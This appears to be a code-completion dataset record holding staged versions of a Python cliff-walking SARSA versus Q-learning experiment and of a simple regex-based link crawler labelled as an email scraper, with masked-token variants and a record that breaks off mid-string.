'Q_LEARNING',\n epsilon, PLOTS, fig, axes)\n display_optimal_policy(end_states_q_learning, 'Q LEARNING', epsilon)\n mistakes_q_learning.append((epsilon, _mistakes_q_learning))\n rewards.append(('Q_LEARNING', epsilon, episode_rewards))\n PLOTS += 1\nfor epsilon in EPSILONS:\n if METHOD == 'SARSA' or METHOD == 'BOTH':\n _mistakes_sarsa, end_states_sarsa, episode_rewards = run_code(\n use_q_learning=False, _epsilon=epsilon)\n plot_best_q_values_states(end_states_sarsa, 'SARSA', epsilon, PLOTS,\n fig, axes)\n display_optimal_policy(end_states_sarsa, 'SARSA', epsilon)\n mistakes_sarsa.append((epsilon, _mistakes_sarsa))\n rewards.append(('SARSA', epsilon, episode_rewards))\n PLOTS += 1\nplt.savefig('all_runs.png')\nplt.show()\nfor reward in rewards:\n plt.plot(reward[2], label='{} ε = {} '.format(reward[0], reward[1]))\n plt.xlabel('Episodes')\n plt.ylabel('Sum of rewards during episode')\nplt.legend()\nplt.show()\nplt.savefig('episode_rewards.png')\nplot_errors(mistakes_sarsa, mistakes_q_learning)\n",
"step-4": "from math import *\nfrom numpy import *\nfrom random import *\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom colorama import Fore, Back, Style\nfrom gridworld import q_to_arrow\nN_ROWS = 6\nN_COLUMNS = 10\n\n\nclass State(object):\n\n def __init__(self, i, j, is_cliff=False, is_goal=False):\n self.i = i\n self.j = j\n self.is_cliff = is_cliff\n self.is_goal = is_goal\n self.q_values = np.array([0.0, 0.0, 0.0, 0.0])\n\n def __str__(self):\n return '({}, {})'.format(self.i, self.j)\n\n def is_terminal(self):\n return self.is_goal or self.is_cliff\n\n def get_max_q_index(self):\n best_q_values = np.argwhere(self.q_values == np.max(self.q_values))\n if len(best_q_values) > 1:\n return best_q_values[randint(0, len(best_q_values) - 1)][0]\n else:\n _max_q = np.argmax(self.q_values)\n return _max_q\n\n def get_max_q_value(self):\n return np.max(self.q_values)\n\n\ndef initialize_states():\n states = [[State(j, i) for i in range(N_COLUMNS)] for j in range(N_ROWS)]\n for j in range(1, N_COLUMNS - 1):\n states[-1][j].is_cliff = True\n states[-1][-1].is_goal = True\n return states\n\n\ndef reward(s_1, s_2):\n if s_1.is_goal or s_1.is_cliff:\n return 0\n elif s_2.is_goal:\n return 10\n elif s_2.is_cliff:\n return -100\n else:\n return -1\n\n\n<mask token>\n\n\ndef transition(stsp, s, di, dj):\n if s.is_cliff or s.is_goal:\n return s\n elif s.j + dj not in range(N_COLUMNS) or s.i + di not in range(N_ROWS):\n return s\n else:\n return stsp[s.i + di][s.j + dj]\n\n\ngamma = 1\nlearning_rate = 0.01\n\n\ndef action_to_diff_vector(action):\n if action == 0:\n return -1, 0\n elif action == 1:\n return 0, 1\n elif action == 2:\n return 1, 0\n elif action == 3:\n return 0, -1\n\n\ndef action_to_verbose(action):\n if action == 0:\n return 'NORTH'\n elif action == 1:\n return 'EAST'\n elif action == 2:\n return 'SOUTH'\n elif action == 3:\n return 'WEST'\n\n\ndef sarsa(state, next_state, action, next_state_action):\n return reward(state, next_state), state.q_values[action\n ] + learning_rate * (reward(state, next_state) + gamma * next_state\n .q_values[next_state_action] - state.q_values[action])\n\n\ndef q_learning(state, next_state, action, next_state_action):\n next_state_q_value = next_state.get_max_q_value()\n return reward(state, next_state), state.q_values[action\n ] + learning_rate * (reward(state, next_state) + gamma *\n next_state_q_value - state.q_values[action])\n\n\nN_STEPS = 10000\nMETHOD = 'BOTH'\nEPSILONS = [0.05, 0.1, 0.25]\n\n\ndef run_code(use_q_learning=False, _epsilon=0.01):\n states = initialize_states()\n decay = 1\n min_epsilon = 1e-05\n epsilon = _epsilon\n episode_rewards = []\n mistakes_array = []\n for i in range(N_STEPS):\n current_state = states[N_ROWS - 1][0]\n epsilon = max(min_epsilon, epsilon * decay)\n episode_reward = 0\n while not current_state.is_terminal():\n if random() < epsilon:\n next_action = randint(0, 3)\n else:\n next_action = current_state.get_max_q_index()\n di, dj = action_to_diff_vector(next_action)\n next_state = transition(states, current_state, di, dj)\n if random() < epsilon:\n next_state_action = randint(0, 3)\n else:\n next_state_action = next_state.get_max_q_index()\n if use_q_learning:\n reward, current_state.q_values[next_action] = q_learning(\n current_state, next_state, next_action, next_state_action)\n else:\n reward, current_state.q_values[next_action] = sarsa(\n current_state, next_state, next_action, next_state_action)\n episode_reward += reward\n current_state = next_state\n if len(episode_rewards):\n episode_rewards.append(episode_rewards[-1] + episode_reward)\n else:\n episode_rewards.append(episode_reward)\n \"\"\"\n if (i % 100 == 0):\n print(i)\n \"\"\"\n mistakes_array.append(check_accuracy(states))\n return np.array(mistakes_array), states, episode_rewards\n\n\ndef check_accuracy(states):\n correct_result = np.array([[-3, -2, -1, 0, 1, 2, 3, 4, 5, 6], [-2, -1, \n 0, 1, 2, 3, 4, 5, 6, 7], [-1, 0, 1, 2, 3, 4, 5, 6, 7, 8], [0, 1, 2,\n 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9, 10], [0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0]])\n mistakes_delta = 0\n for i in range(N_ROWS):\n for j in range(N_COLUMNS):\n mistakes_delta += abs(correct_result[i][j] - max(states[i][j].\n q_values))\n return mistakes_delta\n\n\ndef plot_errors(mistakes_sarsa, mistakes_q_learning):\n plt.gca().invert_yaxis()\n legend = []\n for mistake_sarsa in mistakes_sarsa:\n plt.plot(mistake_sarsa[1])\n legend.append('SARSA $\\\\epsilon={}$'.format(mistake_sarsa[0]))\n for mistake_q_learning in mistakes_q_learning:\n plt.plot(mistake_q_learning[1])\n legend.append('Q-learning $\\\\epsilon={}$'.format(mistake_q_learning[0])\n )\n plt.grid(which='y')\n plt.legend(legend)\n plt.savefig('CLIFF_SARSA_VS_Q_LEARNING_{}.png'.format(N_STEPS))\n\n\ndef plot_best_q_values_states(states, method, epsilon, PLOTS, fig, ax):\n final_grid = np.array([[max(states[i][j].q_values) for j in range(\n N_COLUMNS)] for i in range(N_ROWS)])\n if PLOTS > 2:\n ax = ax[PLOTS % 3, 1]\n else:\n ax = ax[PLOTS, 0]\n ax.imshow(final_grid, aspect='auto', cmap='coolwarm')\n ax.set_xticks(np.arange(N_COLUMNS))\n ax.set_yticks(np.arange(N_ROWS))\n ax.set_xticklabels([i for i in range(N_COLUMNS)])\n ax.set_yticklabels([i for i in range(N_ROWS)])\n plt.setp(ax.get_xticklabels(), rotation=45, ha='right', rotation_mode=\n 'anchor')\n for i in range(N_ROWS):\n for j in range(N_COLUMNS):\n text = ax.text(j, i, '{:.2f}'.format(max(states[i][j].q_values)\n ), ha='center', va='center', color='w')\n fig.tight_layout()\n ax.set_title('{}; $\\\\epsilon={}$'.format(method, epsilon))\n for i in range(N_ROWS):\n str_ = ''\n for j in range(N_COLUMNS):\n str_ += str(int(final_grid[i][j])) + ', '\n PLOTS += 1\n\n\ndef display_optimal_policy(states, method, epsilon):\n print('{}; ε = {}'.format(method, epsilon))\n print('-' * 60)\n for i in range(len(states)):\n line_str = ''\n for j in range(len(states[0])):\n if j == 0:\n print('|', end='')\n if states[i][j].is_goal:\n print(Back.GREEN + ' ', end='')\n print(Style.RESET_ALL + ' | ', end='')\n elif states[i][j].is_cliff:\n print(Back.RED + ' ', end='')\n print(Style.RESET_ALL + ' | ', end='')\n else:\n print(' {} | '.format(q_to_arrow(states[i][j].\n get_max_q_index())), end='')\n print(line_str)\n print('-' * 60)\n\n\nif METHOD not in ['Q_LEARNING', 'SARSA', 'BOTH']:\n print('invalidt method. must be Q_LEARNING or SARSA or both')\n import sys\n sys.exit()\nmistakes_q_learning = []\nmistakes_sarsa = []\nPLOTS = 0\nfig, axes = plt.subplots(3, 2)\nrewards = []\nfor epsilon in EPSILONS:\n if METHOD == 'Q_LEARNING' or METHOD == 'BOTH':\n _mistakes_q_learning, end_states_q_learning, episode_rewards = (\n run_code(use_q_learning=True, _epsilon=epsilon))\n plot_best_q_values_states(end_states_q_learning, 'Q_LEARNING',\n epsilon, PLOTS, fig, axes)\n display_optimal_policy(end_states_q_learning, 'Q LEARNING', epsilon)\n mistakes_q_learning.append((epsilon, _mistakes_q_learning))\n rewards.append(('Q_LEARNING', epsilon, episode_rewards))\n PLOTS += 1\nfor epsilon in EPSILONS:\n if METHOD == 'SARSA' or METHOD == 'BOTH':\n _mistakes_sarsa, end_states_sarsa, episode_rewards = run_code(\n use_q_learning=False, _epsilon=epsilon)\n plot_best_q_values_states(end_states_sarsa, 'SARSA', epsilon, PLOTS,\n fig, axes)\n display_optimal_policy(end_states_sarsa, 'SARSA', epsilon)\n mistakes_sarsa.append((epsilon, _mistakes_sarsa))\n rewards.append(('SARSA', epsilon, episode_rewards))\n PLOTS += 1\nplt.savefig('all_runs.png')\nplt.show()\nfor reward in rewards:\n plt.plot(reward[2], label='{} ε = {} '.format(reward[0], reward[1]))\n plt.xlabel('Episodes')\n plt.ylabel('Sum of rewards during episode')\nplt.legend()\nplt.show()\nplt.savefig('episode_rewards.png')\nplot_errors(mistakes_sarsa, mistakes_q_learning)\n",
"step-5": "from math import *\nfrom numpy import *\nfrom random import *\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom colorama import Fore, Back, Style\nfrom gridworld import q_to_arrow\n\n\nN_ROWS = 6\nN_COLUMNS = 10\n\nclass State(object):\n def __init__(self, i, j, is_cliff=False, is_goal=False):\n self.i = i\n self.j = j\n self.is_cliff = is_cliff\n self.is_goal = is_goal\n # north, east, south, west\n self.q_values = np.array([0.0, 0.0, 0.0, 0.0])\n\n def __str__(self):\n return '({}, {})'.format(self.i, self.j)\n\n def is_terminal(self):\n return self.is_goal or self.is_cliff\n\n def get_max_q_index(self):\n best_q_values = np.argwhere(self.q_values == np.max(self.q_values))\n if len(best_q_values) > 1:\n return best_q_values[randint(0, len(best_q_values) - 1)][0]\n else:\n _max_q = np.argmax(self.q_values)\n return _max_q\n\n def get_max_q_value(self):\n return np.max(self.q_values)\n\n\ndef initialize_states():\n # This is the set of states, all initialised with default values\n states = [[State(j, i) for i in range(N_COLUMNS)] for j in range(N_ROWS)]\n\n # make the cliff\n for j in range(1, N_COLUMNS - 1):\n states[-1][j].is_cliff = True\n\n states[-1][-1].is_goal = True\n return states\n\n\n# The reward function defines what reward I get for transitioning between the first and second state\ndef reward(s_1, s_2):\n if (s_1.is_goal or s_1.is_cliff):\n return 0\n elif (s_2.is_goal):\n return 10\n elif (s_2.is_cliff):\n return -100\n else:\n return -1\n\n\"\"\" the transition function takes state and action and results in a new state, depending on their attributes. The method takes the whole state-space as an argument (since the transition depends on the attributes of the states in the state-space), which could for example be the \"states\" matrix from above, the current state s from the state-space (with its attributes), and the current action, which takes the form of a \"difference vector. For example, dx = 0, dy = 1 means: Move to the south. dx = -1, dy = 0 means: Move to the left\"\"\"\ndef transition(stsp, s, di, dj):\n if (s.is_cliff or s.is_goal):\n return s\n elif (s.j + dj not in range(N_COLUMNS) or s.i + di not in range(N_ROWS)):\n return s\n else:\n return stsp[s.i + di][s.j + dj]\n\ngamma = 1\nlearning_rate = 0.01\n\ndef action_to_diff_vector(action):\n if action == 0: # NORTH\n return -1, 0\n elif action == 1: # EAST\n return 0, 1\n elif action == 2: # SOUTH\n return 1, 0\n elif action == 3: # WEST\n return 0, -1\n\ndef action_to_verbose(action):\n if action == 0:\n return 'NORTH'\n elif action == 1:\n return 'EAST'\n elif action == 2:\n return 'SOUTH'\n elif action == 3:\n return 'WEST'\n\n\ndef sarsa(state, next_state, action, next_state_action):\n return reward(state, next_state), state.q_values[action] +\\\n learning_rate * (reward(state, next_state) + gamma * next_state.q_values[next_state_action] - state.q_values[action])\n\n\ndef q_learning(state, next_state, action, next_state_action):\n next_state_q_value = next_state.get_max_q_value()\n return reward(state, next_state), state.q_values[action] +\\\n learning_rate * (reward(state, next_state) + gamma * next_state_q_value - state.q_values[action])\n\nN_STEPS = 10000\nMETHOD = 'BOTH'\nEPSILONS = [0.05, 0.1, 0.25]\n\ndef run_code(use_q_learning=False, _epsilon=0.01):\n states = initialize_states()\n decay = 1\n min_epsilon = 0.00001\n epsilon = _epsilon\n\n episode_rewards = []\n mistakes_array = [] # array which tracks error from convergence on each step\n for i in range(N_STEPS):\n # select a random starting state\n current_state = states[N_ROWS-1][0]\n\n # iterate until reaching a terminal state\n epsilon = max(min_epsilon, epsilon * decay)\n episode_reward = 0\n while not current_state.is_terminal():\n\n if random() < epsilon:\n next_action = randint(0, 3)\n else:\n next_action = current_state.get_max_q_index()\n\n di, dj = action_to_diff_vector(next_action)\n next_state = transition(states, current_state, di, dj)\n\n if random() < epsilon:\n next_state_action = randint(0, 3)\n else:\n next_state_action = next_state.get_max_q_index()\n\n if use_q_learning:\n reward, current_state.q_values[next_action] = q_learning(current_state, next_state, next_action, next_state_action)\n else:\n reward, current_state.q_values[next_action] = sarsa(current_state, next_state, next_action, next_state_action)\n\n # print(current_state, next_state, action_to_verbose(next_action), di, dj)\n episode_reward += reward\n current_state = next_state\n if len(episode_rewards):\n episode_rewards.append(episode_rewards[-1] + episode_reward)\n else:\n episode_rewards.append(episode_reward)\n\n '''\n if (i % 100 == 0):\n print(i)\n '''\n mistakes_array.append(check_accuracy(states))\n\n return np.array(mistakes_array), states, episode_rewards\n\ndef check_accuracy(states):\n correct_result = np.array([\n [-3, -2, -1, 0 , 1 , 2 , 3 , 4 , 5 , 6 ],\n [-2, -1, 0 , 1 , 2 , 3 , 4 , 5 , 6 , 7 ],\n [-1, 0 , 1 , 2 , 3 , 4 , 5 , 6 , 7 , 8 ],\n [0 , 1 , 2 , 3 , 4 , 5 , 6 , 7 , 8 , 9 ],\n [1 , 2 , 3 , 4 , 5 , 6 , 7 , 8 , 9 , 10 ],\n [0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 ],\n ])\n mistakes_delta = 0\n for i in range(N_ROWS):\n for j in range(N_COLUMNS):\n mistakes_delta += abs(correct_result[i][j] - max(states[i][j].q_values))\n\n return mistakes_delta\n\ndef plot_errors(mistakes_sarsa, mistakes_q_learning):\n plt.gca().invert_yaxis()\n legend = []\n for mistake_sarsa in mistakes_sarsa:\n plt.plot(mistake_sarsa[1])\n legend.append(r'SARSA $\\epsilon={}$'.format(mistake_sarsa[0]))\n for mistake_q_learning in mistakes_q_learning:\n plt.plot(mistake_q_learning[1])\n legend.append(r'Q-learning $\\epsilon={}$'.format(mistake_q_learning[0]))\n\n plt.grid(which='y')\n plt.legend(legend)\n\n plt.savefig('CLIFF_SARSA_VS_Q_LEARNING_{}.png'.format(N_STEPS))\n # plt.show()\n\ndef plot_best_q_values_states(states, method, epsilon, PLOTS, fig, ax):\n final_grid = np.array([[max(states[i][j].q_values) for j in range(N_COLUMNS)] for i in range(N_ROWS)])\n if PLOTS > 2:\n ax = ax[PLOTS % 3, 1]\n else:\n ax = ax[PLOTS, 0]\n ax.imshow(final_grid, aspect='auto', cmap='coolwarm')\n # fig, ax = plt.subplots()\n ax.set_xticks(np.arange(N_COLUMNS))\n ax.set_yticks(np.arange(N_ROWS))\n ax.set_xticklabels([i for i in range(N_COLUMNS)])\n ax.set_yticklabels([i for i in range(N_ROWS)])\n plt.setp(ax.get_xticklabels(), rotation=45, ha=\"right\",\n rotation_mode=\"anchor\")\n\n # Loop over data dimensions and create text annotations.\n for i in range(N_ROWS):\n for j in range(N_COLUMNS):\n text = ax.text(j, i, '{:.2f}'.format(max(states[i][j].q_values)),\n ha=\"center\", va=\"center\", color=\"w\")\n\n fig.tight_layout()\n ax.set_title(\"{}; $\\epsilon={}$\".format(method, epsilon))\n for i in range(N_ROWS):\n str_ = \"\"\n for j in range(N_COLUMNS):\n str_ += str(int(final_grid[i][j])) + \", \"\n PLOTS += 1\n # plt.savefig('CLIFF_WALKING: {}-{}-{}.png'.format(N_STEPS, epsilon, method))\n # plt.show()\n\ndef display_optimal_policy(states, method, epsilon):\n\n print(\"{}; ε = {}\".format(method, epsilon))\n print('-' * 60)\n for i in range(len(states)):\n line_str = ''\n for j in range(len(states[0])):\n if j == 0:\n print('|', end='')\n if states[i][j].is_goal:\n print(Back.GREEN + ' ', end='')\n print(Style.RESET_ALL + ' | ', end='')\n elif states[i][j].is_cliff:\n print(Back.RED + ' ', end='')\n print(Style.RESET_ALL + ' | ', end='')\n else:\n print(' {} | '.format(q_to_arrow(states[i][j].get_max_q_index())), end='')\n print(line_str)\n print('-' * 60)\n\nif METHOD not in ['Q_LEARNING', 'SARSA', 'BOTH']:\n print('invalidt method. must be Q_LEARNING or SARSA or both')\n import sys; sys.exit()\n\nmistakes_q_learning = []\nmistakes_sarsa = []\nPLOTS = 0\nfig, axes = plt.subplots(3, 2)\nrewards = []\nfor epsilon in EPSILONS:\n if METHOD == 'Q_LEARNING' or METHOD == 'BOTH':\n _mistakes_q_learning, end_states_q_learning, episode_rewards = run_code(use_q_learning=True, _epsilon=epsilon)\n plot_best_q_values_states(end_states_q_learning, 'Q_LEARNING', epsilon, PLOTS, fig, axes)\n display_optimal_policy(end_states_q_learning, 'Q LEARNING', epsilon)\n mistakes_q_learning.append((epsilon, _mistakes_q_learning))\n rewards.append(('Q_LEARNING', epsilon, episode_rewards))\n PLOTS += 1\n\nfor epsilon in EPSILONS:\n if METHOD == 'SARSA' or METHOD == 'BOTH':\n _mistakes_sarsa, end_states_sarsa, episode_rewards = run_code(use_q_learning=False, _epsilon=epsilon)\n plot_best_q_values_states(end_states_sarsa, 'SARSA', epsilon, PLOTS, fig, axes)\n display_optimal_policy(end_states_sarsa, 'SARSA', epsilon)\n mistakes_sarsa.append((epsilon, _mistakes_sarsa))\n rewards.append(('SARSA', epsilon, episode_rewards))\n PLOTS += 1\n\n\nplt.savefig('all_runs.png')\nplt.show()\n# for i, j in [(0, 3), (1, 4), (2, 5)]:\nfor reward in rewards:\n # plt.plot(rewards[i][2], 'o', label='{} ε = {} '.format(rewards[i][0], rewards[i][1]))\n # plt.plot(rewards[j][2], 'o', label='{} ε = {} '.format(rewards[j][0], rewards[j][1]))\n plt.plot(reward[2], label='{} ε = {} '.format(reward[0], reward[1]))\n plt.xlabel('Episodes')\n plt.ylabel('Sum of rewards during episode')\nplt.legend()\nplt.show()\nplt.savefig('episode_rewards.png')\n\nplot_errors(mistakes_sarsa, mistakes_q_learning)\n",
"step-ids": [
14,
16,
20,
21,
22
]
}
|
[
14,
16,
20,
21,
22
] |
<|reserved_special_token_0|>
class web_scrap:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def __init__(self, seed):
self.seed = seed
self.set_tag()
self.set_attr()
self.fetch_web(self.seed)
self.crawl()
def fetch_web(self, link):
self.result = r.get(link)
self.extract_tags()
def set_tag(self):
self.re_tag = '(<a [^>]+>)'
def set_attr(self):
self.re_attr_parser = 'href\\=\\"([^\\"]+)\\"'
def extract_tags(self):
title = re.findall('<title>([^<]+)</title>', self.result.text)
if len(title) != 0:
print(title[0])
else:
print('No Title')
tags = re.findall(self.re_tag, self.result.text)
for i in tags:
self.attr_parser(i)
def attr_parser(self, tag):
attributes = re.findall(self.re_attr_parser, tag)
for data in attributes:
if data[0] == '/':
if data[1] == '/':
self.tag_attr.append({data[1:]: 0})
else:
self.tag_attr.append({data: 0})
def crawl(self):
for i in self.tag_attr:
link = list(i.keys())[0]
if not i[link]:
print(link)
self.fetch_web(self.seed + link)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class web_scrap:
seed = ''
result = ''
tag_attr = []
def __init__(self, seed):
self.seed = seed
self.set_tag()
self.set_attr()
self.fetch_web(self.seed)
self.crawl()
def fetch_web(self, link):
self.result = r.get(link)
self.extract_tags()
def set_tag(self):
self.re_tag = '(<a [^>]+>)'
def set_attr(self):
self.re_attr_parser = 'href\\=\\"([^\\"]+)\\"'
def extract_tags(self):
title = re.findall('<title>([^<]+)</title>', self.result.text)
if len(title) != 0:
print(title[0])
else:
print('No Title')
tags = re.findall(self.re_tag, self.result.text)
for i in tags:
self.attr_parser(i)
def attr_parser(self, tag):
attributes = re.findall(self.re_attr_parser, tag)
for data in attributes:
if data[0] == '/':
if data[1] == '/':
self.tag_attr.append({data[1:]: 0})
else:
self.tag_attr.append({data: 0})
def crawl(self):
for i in self.tag_attr:
link = list(i.keys())[0]
if not i[link]:
print(link)
self.fetch_web(self.seed + link)
print('\t HELLO WELCOME TO EMAIL SCRAPPER')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class web_scrap:
seed = ''
result = ''
tag_attr = []
def __init__(self, seed):
self.seed = seed
self.set_tag()
self.set_attr()
self.fetch_web(self.seed)
self.crawl()
def fetch_web(self, link):
self.result = r.get(link)
self.extract_tags()
def set_tag(self):
self.re_tag = '(<a [^>]+>)'
def set_attr(self):
self.re_attr_parser = 'href\\=\\"([^\\"]+)\\"'
def extract_tags(self):
title = re.findall('<title>([^<]+)</title>', self.result.text)
if len(title) != 0:
print(title[0])
else:
print('No Title')
tags = re.findall(self.re_tag, self.result.text)
for i in tags:
self.attr_parser(i)
def attr_parser(self, tag):
attributes = re.findall(self.re_attr_parser, tag)
for data in attributes:
if data[0] == '/':
if data[1] == '/':
self.tag_attr.append({data[1:]: 0})
else:
self.tag_attr.append({data: 0})
def crawl(self):
for i in self.tag_attr:
link = list(i.keys())[0]
if not i[link]:
print(link)
self.fetch_web(self.seed + link)
print('\t HELLO WELCOME TO EMAIL SCRAPPER')
scrap = web_scrap(input('enter the link \t'))
<|reserved_special_token_1|>
import requests as r
import re
class web_scrap:
seed = ''
result = ''
tag_attr = []
def __init__(self, seed):
self.seed = seed
self.set_tag()
self.set_attr()
self.fetch_web(self.seed)
self.crawl()
def fetch_web(self, link):
self.result = r.get(link)
self.extract_tags()
def set_tag(self):
self.re_tag = '(<a [^>]+>)'
def set_attr(self):
self.re_attr_parser = 'href\\=\\"([^\\"]+)\\"'
def extract_tags(self):
title = re.findall('<title>([^<]+)</title>', self.result.text)
if len(title) != 0:
print(title[0])
else:
print('No Title')
tags = re.findall(self.re_tag, self.result.text)
for i in tags:
self.attr_parser(i)
def attr_parser(self, tag):
attributes = re.findall(self.re_attr_parser, tag)
for data in attributes:
if data[0] == '/':
if data[1] == '/':
self.tag_attr.append({data[1:]: 0})
else:
self.tag_attr.append({data: 0})
def crawl(self):
for i in self.tag_attr:
link = list(i.keys())[0]
if not i[link]:
print(link)
self.fetch_web(self.seed + link)
print('\t HELLO WELCOME TO EMAIL SCRAPPER')
scrap = web_scrap(input('enter the link \t'))
<|reserved_special_token_1|>
import requests as r
import re
class web_scrap:
seed=""
result=""
tag_attr=[]
def __init__(self,seed):
self.seed=seed
self.set_tag()
self.set_attr()
self.fetch_web(self.seed)
self.crawl()
def fetch_web(self,link):
self.result=r.get(link)
self.extract_tags()
def set_tag(self):
self.re_tag=r"(<a [^>]+>)"
def set_attr(self):
self.re_attr_parser=r"href\=\"([^\"]+)\""
def extract_tags(self):
title=re.findall(r"<title>([^<]+)</title>",self.result.text)
if len(title)!=0:
print(title[0])
else:
print("No Title")
tags=re.findall(self.re_tag,self.result.text)
for i in tags:
self.attr_parser(i)
def attr_parser(self,tag):
attributes=re.findall(self.re_attr_parser,tag)
for data in attributes:
if data[0]=="/":
if data[1]=="/":
self.tag_attr.append({data[1:]:0})
else:
self.tag_attr.append({data:0})
def crawl(self):
for i in self.tag_attr:
link=list(i.keys())[0]
if(not i[link]):
print(link)
self.fetch_web(self.seed+link)
print("\t HELLO WELCOME TO EMAIL SCRAPPER")
scrap=web_scrap(input("enter the link \t"))
|
flexible
|
{
"blob_id": "f26dc3139413c4ed4b04484c095a433e53039cdb",
"index": 3028,
"step-1": "<mask token>\n\n\nclass web_scrap:\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self, seed):\n self.seed = seed\n self.set_tag()\n self.set_attr()\n self.fetch_web(self.seed)\n self.crawl()\n\n def fetch_web(self, link):\n self.result = r.get(link)\n self.extract_tags()\n\n def set_tag(self):\n self.re_tag = '(<a [^>]+>)'\n\n def set_attr(self):\n self.re_attr_parser = 'href\\\\=\\\\\"([^\\\\\"]+)\\\\\"'\n\n def extract_tags(self):\n title = re.findall('<title>([^<]+)</title>', self.result.text)\n if len(title) != 0:\n print(title[0])\n else:\n print('No Title')\n tags = re.findall(self.re_tag, self.result.text)\n for i in tags:\n self.attr_parser(i)\n\n def attr_parser(self, tag):\n attributes = re.findall(self.re_attr_parser, tag)\n for data in attributes:\n if data[0] == '/':\n if data[1] == '/':\n self.tag_attr.append({data[1:]: 0})\n else:\n self.tag_attr.append({data: 0})\n\n def crawl(self):\n for i in self.tag_attr:\n link = list(i.keys())[0]\n if not i[link]:\n print(link)\n self.fetch_web(self.seed + link)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass web_scrap:\n seed = ''\n result = ''\n tag_attr = []\n\n def __init__(self, seed):\n self.seed = seed\n self.set_tag()\n self.set_attr()\n self.fetch_web(self.seed)\n self.crawl()\n\n def fetch_web(self, link):\n self.result = r.get(link)\n self.extract_tags()\n\n def set_tag(self):\n self.re_tag = '(<a [^>]+>)'\n\n def set_attr(self):\n self.re_attr_parser = 'href\\\\=\\\\\"([^\\\\\"]+)\\\\\"'\n\n def extract_tags(self):\n title = re.findall('<title>([^<]+)</title>', self.result.text)\n if len(title) != 0:\n print(title[0])\n else:\n print('No Title')\n tags = re.findall(self.re_tag, self.result.text)\n for i in tags:\n self.attr_parser(i)\n\n def attr_parser(self, tag):\n attributes = re.findall(self.re_attr_parser, tag)\n for data in attributes:\n if data[0] == '/':\n if data[1] == '/':\n self.tag_attr.append({data[1:]: 0})\n else:\n self.tag_attr.append({data: 0})\n\n def crawl(self):\n for i in self.tag_attr:\n link = list(i.keys())[0]\n if not i[link]:\n print(link)\n self.fetch_web(self.seed + link)\n\n\nprint('\\t HELLO WELCOME TO EMAIL SCRAPPER')\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass web_scrap:\n seed = ''\n result = ''\n tag_attr = []\n\n def __init__(self, seed):\n self.seed = seed\n self.set_tag()\n self.set_attr()\n self.fetch_web(self.seed)\n self.crawl()\n\n def fetch_web(self, link):\n self.result = r.get(link)\n self.extract_tags()\n\n def set_tag(self):\n self.re_tag = '(<a [^>]+>)'\n\n def set_attr(self):\n self.re_attr_parser = 'href\\\\=\\\\\"([^\\\\\"]+)\\\\\"'\n\n def extract_tags(self):\n title = re.findall('<title>([^<]+)</title>', self.result.text)\n if len(title) != 0:\n print(title[0])\n else:\n print('No Title')\n tags = re.findall(self.re_tag, self.result.text)\n for i in tags:\n self.attr_parser(i)\n\n def attr_parser(self, tag):\n attributes = re.findall(self.re_attr_parser, tag)\n for data in attributes:\n if data[0] == '/':\n if data[1] == '/':\n self.tag_attr.append({data[1:]: 0})\n else:\n self.tag_attr.append({data: 0})\n\n def crawl(self):\n for i in self.tag_attr:\n link = list(i.keys())[0]\n if not i[link]:\n print(link)\n self.fetch_web(self.seed + link)\n\n\nprint('\\t HELLO WELCOME TO EMAIL SCRAPPER')\nscrap = web_scrap(input('enter the link \\t'))\n",
"step-4": "import requests as r\nimport re\n\n\nclass web_scrap:\n seed = ''\n result = ''\n tag_attr = []\n\n def __init__(self, seed):\n self.seed = seed\n self.set_tag()\n self.set_attr()\n self.fetch_web(self.seed)\n self.crawl()\n\n def fetch_web(self, link):\n self.result = r.get(link)\n self.extract_tags()\n\n def set_tag(self):\n self.re_tag = '(<a [^>]+>)'\n\n def set_attr(self):\n self.re_attr_parser = 'href\\\\=\\\\\"([^\\\\\"]+)\\\\\"'\n\n def extract_tags(self):\n title = re.findall('<title>([^<]+)</title>', self.result.text)\n if len(title) != 0:\n print(title[0])\n else:\n print('No Title')\n tags = re.findall(self.re_tag, self.result.text)\n for i in tags:\n self.attr_parser(i)\n\n def attr_parser(self, tag):\n attributes = re.findall(self.re_attr_parser, tag)\n for data in attributes:\n if data[0] == '/':\n if data[1] == '/':\n self.tag_attr.append({data[1:]: 0})\n else:\n self.tag_attr.append({data: 0})\n\n def crawl(self):\n for i in self.tag_attr:\n link = list(i.keys())[0]\n if not i[link]:\n print(link)\n self.fetch_web(self.seed + link)\n\n\nprint('\\t HELLO WELCOME TO EMAIL SCRAPPER')\nscrap = web_scrap(input('enter the link \\t'))\n",
"step-5": "import requests as r\r\nimport re\r\nclass web_scrap:\r\n seed=\"\"\r\n result=\"\"\r\n tag_attr=[]\r\n \r\n def __init__(self,seed):\r\n self.seed=seed\r\n self.set_tag()\r\n self.set_attr()\r\n self.fetch_web(self.seed)\r\n self.crawl() \r\n\r\n\r\n def fetch_web(self,link):\r\n self.result=r.get(link)\r\n self.extract_tags()\r\n \r\n def set_tag(self):\r\n self.re_tag=r\"(<a [^>]+>)\"\r\n\r\n def set_attr(self):\r\n self.re_attr_parser=r\"href\\=\\\"([^\\\"]+)\\\"\"\r\n\r\n def extract_tags(self):\r\n title=re.findall(r\"<title>([^<]+)</title>\",self.result.text)\r\n if len(title)!=0:\r\n print(title[0])\r\n else:\r\n print(\"No Title\")\r\n tags=re.findall(self.re_tag,self.result.text)\r\n for i in tags:\r\n self.attr_parser(i)\r\n\r\n def attr_parser(self,tag):\r\n attributes=re.findall(self.re_attr_parser,tag)\r\n for data in attributes:\r\n if data[0]==\"/\":\r\n if data[1]==\"/\":\r\n self.tag_attr.append({data[1:]:0})\r\n else:\r\n self.tag_attr.append({data:0})\r\n \r\n def crawl(self):\r\n for i in self.tag_attr:\r\n link=list(i.keys())[0]\r\n if(not i[link]):\r\n print(link)\r\n self.fetch_web(self.seed+link)\r\n \r\n \r\n \r\nprint(\"\\t HELLO WELCOME TO EMAIL SCRAPPER\")\r\n\r\nscrap=web_scrap(input(\"enter 